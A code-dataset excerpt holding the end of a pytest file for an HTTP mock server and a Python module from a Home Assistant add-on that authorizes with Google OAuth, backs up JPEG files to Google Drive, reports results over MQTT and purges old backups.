def test_002_request_to_rules_and_functions(h1mc_traffic):
# Send GET
response = h1mc_traffic.get("app/v1/foo/bar")
# Verify response
assert response.status_code == 200
assert response.json()["resultData"] == "answering a get"
def test_003_provision_default(resources, h1mc_admin):
# Send POST
default = resources("default")
response = h1mc_admin.postData("app/v1/provision/other_provision", default)
# Verify response
assert response.status_code == 201
assert response.json()["result"] == "success: basename file 'other_provision' has been loaded"
def test_004_request_to_default(h1mc_traffic):
# Send GET
response = h1mc_traffic.get("app/v1/any/path")
# Verify response
assert response.status_code == 404
assert response.text == '<a href="https://github.com/testillano/h1mock#how-it-works">help here for mock provisions</a>'
| 27.782609
| 121
| 0.754304
|
795008dd550f3e82af873bfde617609d890a27fb
| 11,428
|
py
|
Python
|
hassiogooglebackup/googlebackup/gbcommon.py
|
ulf111/syncjpg
|
2d959e4f0708132bf8bd7b242b5278d680cf6769
|
[
"MIT"
] | null | null | null |
hassiogooglebackup/googlebackup/gbcommon.py
|
ulf111/syncjpg
|
2d959e4f0708132bf8bd7b242b5278d680cf6769
|
[
"MIT"
] | null | null | null |
hassiogooglebackup/googlebackup/gbcommon.py
|
ulf111/syncjpg
|
2d959e4f0708132bf8bd7b242b5278d680cf6769
|
[
"MIT"
] | null | null | null |
import googleapiclient.http
from google_auth_oauthlib.flow import InstalledAppFlow
from google_auth_oauthlib.flow import Flow
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
from httplib2 import Http
import logging
import requests
from django.conf import settings
import os
import json
import glob
import ntpath
from pprint import pformat
import datetime
import mimetypes
OAUTH2_SCOPE = 'https://www.googleapis.com/auth/drive.file'
CLIENT_SECRET = os.path.join(settings.BASE_DIR, "client_secret.json")
TOKEN = os.path.join(settings.DATA_PATH, "token.json")
CONFIG_FILE = os.path.join(settings.DATA_PATH, "options.json")
def getOptions():
with open(CONFIG_FILE) as f:
options = json.load(f)
return options
def getFlowFromClientSecret():
flow = InstalledAppFlow.from_client_secrets_file(
CLIENT_SECRET,
scopes=[OAUTH2_SCOPE])
return flow
def getFlowFromClientSecret_Step2(saved_state):
flow = Flow.from_client_secrets_file(
CLIENT_SECRET,
scopes=[OAUTH2_SCOPE],
state=saved_state)
return flow
def requestAuthorization():
flow = getFlowFromClientSecret()
# Indicate where the API server will redirect the user after the user completes
# the authorization flow. The redirect URI is required.
flow.redirect_uri = "urn:ietf:wg:oauth:2.0:oob"
# Generate URL for request to Google's OAuth 2.0 server.
# Use kwargs to set optional request parameters.
authorization_url, state = flow.authorization_url(
# Enable offline access so that you can refresh an access token without
# re-prompting the user for permission. Recommended for web server apps.
access_type='offline',
# Enable incremental authorization. Recommended as a best practice.
include_granted_scopes='true')
return authorization_url, state
def fetchAndSaveTokens(saved_state, redirect_uri, authorization_response, authorizationCode):
flow = getFlowFromClientSecret_Step2(saved_state)
# flow.redirect_uri = redirect_uri
flow.redirect_uri = "urn:ietf:wg:oauth:2.0:oob"
flow.fetch_token(code=authorizationCode)
# Store the credentials for later use by REST service
credentials = flow.credentials
tokens = {
'token': credentials.token,
'refresh_token': credentials.refresh_token,
'token_uri': credentials.token_uri,
'client_id': credentials.client_id,
'client_secret': credentials.client_secret,
'scopes': credentials.scopes
}
with open(TOKEN, 'w') as outfile:
json.dump(tokens, outfile)
def getDriveService(user_agent):
with open(TOKEN) as f:
creds = json.load(f)
credentials = GoogleCredentials(None,creds["client_id"],creds["client_secret"],
creds["refresh_token"],None,"https://accounts.google.com/o/oauth2/token",user_agent)
http = credentials.authorize(Http())
credentials.refresh(http)
drive_service = build('drive', 'v3', http)
return drive_service
def alreadyBackedUp(fileName, backupDirID, drive_service):
shortFileName = ntpath.basename(fileName)
# Search for given file in Google Drive Directory
results = drive_service.files().list(
q="name='" + shortFileName + "' and '" + backupDirID + "' in parents and trashed = false",
spaces='drive',
fields="files(id, name)").execute()
items = results.get('files', [])
return len(items) > 0
def deleteIfThere(fileName, backupDirID, drive_service):
shortFileName = ntpath.basename(fileName)
logging.debug("Will delete " + shortFileName + " if it is already in Google Drive.")
# Search for given file in Google Drive Directory
results = drive_service.files().list(
q="name='" + shortFileName + "' and '" + backupDirID + "' in parents and trashed = false",
spaces='drive',
fields="files(id, name)").execute()
items = results.get('files', [])
logging.debug("Found " + str(len(items)) + " files named " + shortFileName + " in Google Drive.")
deletedCount = 0
for file in items:
drive_service.files().delete(fileId=file.get('id')).execute()
deletedCount += 1
logging.info("Deleted " + file.get('name') + " : " + file.get('id'))
logging.info("Deleted " + str(deletedCount) + " files named " + shortFileName + " from Google Drive.")
return deletedCount
def backupFile(fileName, backupDirID, drive_service, MIMETYPE, TITLE, DESCRIPTION):
logging.info("Backing up " + fileName + " to " + backupDirID)
logging.debug("drive_service = " + str(drive_service))
logging.debug("MIMETYPE = " + MIMETYPE)
logging.debug("TITLE = " + TITLE)
logging.debug("DESCRIPTION = " + DESCRIPTION)
shortFileName = ntpath.basename(fileName)
media_body = googleapiclient.http.MediaFileUpload(
fileName,
mimetype="image/jpeg",
resumable=True
)
logging.debug("media_body: " + str(media_body))
body = {
'name': shortFileName,
'title': TITLE,
'description': DESCRIPTION,
'parents': [backupDirID]
}
new_file = drive_service.files().create(
body=body, media_body=media_body).execute()
logging.debug(pformat(new_file))
def publishResult(result):
url = settings.HA_MQTT_PUBLISH_URL
data = {"payload" : json.dumps(result),
"topic" : settings.HA_MQTT_RESULT_TOPIC,
"retain" : settings.HA_MQTT_RESULT_RETAIN}
data_json = json.dumps(data)
headers = {'Content-type': 'application/json',
'Authorization': 'Bearer ' + settings.HA_TOKEN}
response = requests.post(url, data=data_json, headers=headers)
logging.debug(pformat(response))
def publishAdhocResult(result):
url = settings.HA_MQTT_PUBLISH_URL
data = {"payload" : json.dumps(result),
"topic" : settings.HA_MQTT_ADHOC_RESULT_TOPIC,
"retain" : settings.HA_MQTT_ADHOC_RESULT_RETAIN}
data_json = json.dumps(data)
headers = {'Content-type': 'application/json',
'Authorization': 'Bearer ' + settings.HA_TOKEN}
response = requests.post(url, data=data_json, headers=headers)
logging.debug(pformat(response))
def adhocBackupFiles(fromPatterns, backupDirID, user_agent):
logging.debug("Adhoc backup fromPatterns: " + str(fromPatterns))
logging.debug("Adhoc backup backupDirID: " + backupDirID)
logging.debug("Adhoc backup user_agent: " + user_agent)
backupTimestamp = datetime.datetime.now().isoformat()
drive_service = getDriveService(user_agent)
copyCount = 0
newCount = 0
replacedCount = 0
filesToCopy = []
for fromPattern in fromPatterns:
globResult = glob.glob(fromPattern)
logging.debug("glob of " + fromPattern + " returned " + str(globResult))
filesToCopy.extend(globResult)
logging.debug("Files to copy: " + str(filesToCopy))
for file in filesToCopy:
file_size = os.path.getsize(file)
if file_size == 0:
raise Exception("The file, " + file + " is empty. This application cannot copy empty (size = 0) files to Google Drive.")
matchesFound = deleteIfThere(file, backupDirID, drive_service)
if matchesFound == 0:
newCount += 1
else:
replacedCount += matchesFound
shortFileName = ntpath.basename(file)
MIMETYPE = "image/jpeg"
TITLE = shortFileName
DESCRIPTION = 'Backup from hassio of ' + file
backupFile(file, backupDirID, drive_service, MIMETYPE, TITLE, DESCRIPTION)
copyCount += 1
result = {'adhocBackupTimestamp': backupTimestamp,
'fromPatterns': fromPatterns,
'backupDirID': backupDirID,
'copyCount': copyCount,
'newCount': newCount,
'replacedCount': replacedCount}
return result
def backupFiles(fromPattern, backupDirID, user_agent):
logging.debug("backup fromPattern: " + fromPattern)
logging.debug("backup backupDirID: " + backupDirID)
logging.debug("backup user_agent: " + user_agent)
backupTimestamp = datetime.datetime.now().isoformat()
drive_service = getDriveService(user_agent)
fileCount = 0
alreadyCount = 0
backedUpCount = 0
for file in glob.glob(fromPattern):
fileCount += 1
file_size = os.path.getsize(file)
if file_size == 0:
raise Exception("The file, " + file + " is empty. This application cannot copy empty (size = 0) files to Google Drive.")
if alreadyBackedUp(file, backupDirID, drive_service):
alreadyCount += 1
else:
# Metadata about the file.
# Only supported file type right now is tar file.
MIMETYPE = 'image/jpeg'
TITLE = 'Kamera'
DESCRIPTION = 'adHoc Sync'
backupFile(file, backupDirID, drive_service, MIMETYPE, TITLE, DESCRIPTION)
backedUpCount += 1
result = {'backupTimestamp': backupTimestamp,
'fromPattern': fromPattern,
'backupDirID': backupDirID,
'fileCount': fileCount,
'alreadyCount': alreadyCount,
'backedUpCount': backedUpCount}
return result
def purgeOldFiles(fromPattern, preserve):
logging.info("Beginning purge process...")
logging.debug("fromPattern = " + fromPattern)
logging.debug("preserve = " + str(preserve))
sourceFiles = sorted(glob.glob(fromPattern), key=os.path.getmtime)
numSourceFiles = len(sourceFiles)
deletedCount = 0
if numSourceFiles > preserve:
numToDelete = numSourceFiles - preserve
filesToDelete = sourceFiles[:numToDelete]
for file in filesToDelete:
os.remove(file)
deletedCount += 1
logging.info("Deleted " + os.path.basename(file))
else:
logging.info("Nothing to purge")
return deletedCount
def purgeOldGoogleFiles(backupDirID, preserve, user_agent):
logging.info("Beginning purge Google Drive process...")
logging.debug("backupDirID = " + backupDirID)
logging.debug("preserve = " + str(preserve))
drive_service = getDriveService(user_agent)
# Search for all files in Google Drive Directory
items = []
token = None
results = None
while True:
if (results is not None and token is None):
break
results = drive_service.files().list(
q="'" + backupDirID + "' in parents and trashed = false",
spaces='drive',
orderBy='modifiedTime',
pageToken=token,
fields="nextPageToken, files(id, name)").execute()
token = results.get('nextPageToken')
items.extend(results.get('files', []))
numSourceFiles = len(items)
logging.debug("Found " + str(numSourceFiles) + " files in Google Drive folder.")
deletedCount = 0
if numSourceFiles > preserve:
numToDelete = numSourceFiles - preserve
filesToDelete = items[:numToDelete]
for file in filesToDelete:
drive_service.files().delete(fileId=file.get('id')).execute()
deletedCount += 1
logging.info("Deleted " + file.get('name') + " : " + file.get('id'))
else:
logging.info("Nothing to purge from Google Drive")
return deletedCount
| 34.421687
| 132
| 0.659608
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.